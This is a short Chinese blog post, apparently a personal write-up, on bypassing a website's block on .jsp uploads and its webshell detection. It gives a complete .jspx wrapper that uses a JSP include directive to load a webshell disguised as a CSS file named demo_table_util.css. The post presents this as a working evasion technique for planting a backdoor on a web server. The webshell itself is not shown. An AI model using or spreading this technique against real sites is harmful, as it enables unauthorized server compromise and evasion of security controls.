记一次对上传对jsp限制的绕过

当访问网站任何.jsp后缀的文件时都会显示如下图所示或者session timeout等提示，

并且网站防护会，对上传大马和一句话会被查杀。

解决方法：

利用jspx包含，利用jspx包含图片或者css等可以绕过防护，demo_table_util.css是大马文件。

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
          xmlns="http://www.w3.org/1999/xhtml"
          xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
    <jsp:directive.page contentType="text/html" pageEncoding="utf-8"/>
    <jsp:directive.page import="java.io.*"/>
    <jsp:directive.page import="java.util.*"/>
    <jsp:directive.page import="javax.servlet.*"/>
    <jsp:directive.page import="javax.servlet.http.*"/>

  <jsp:directive.include file="../css/demo_table_util.css" />


</jsp:root>

posted @ 2016-11-21 21:08 看天空阅读(1749) 评论(0) 编辑收藏举报

刷新页面返回顶部

看天空

记一次对上传对jsp限制的绕过

公告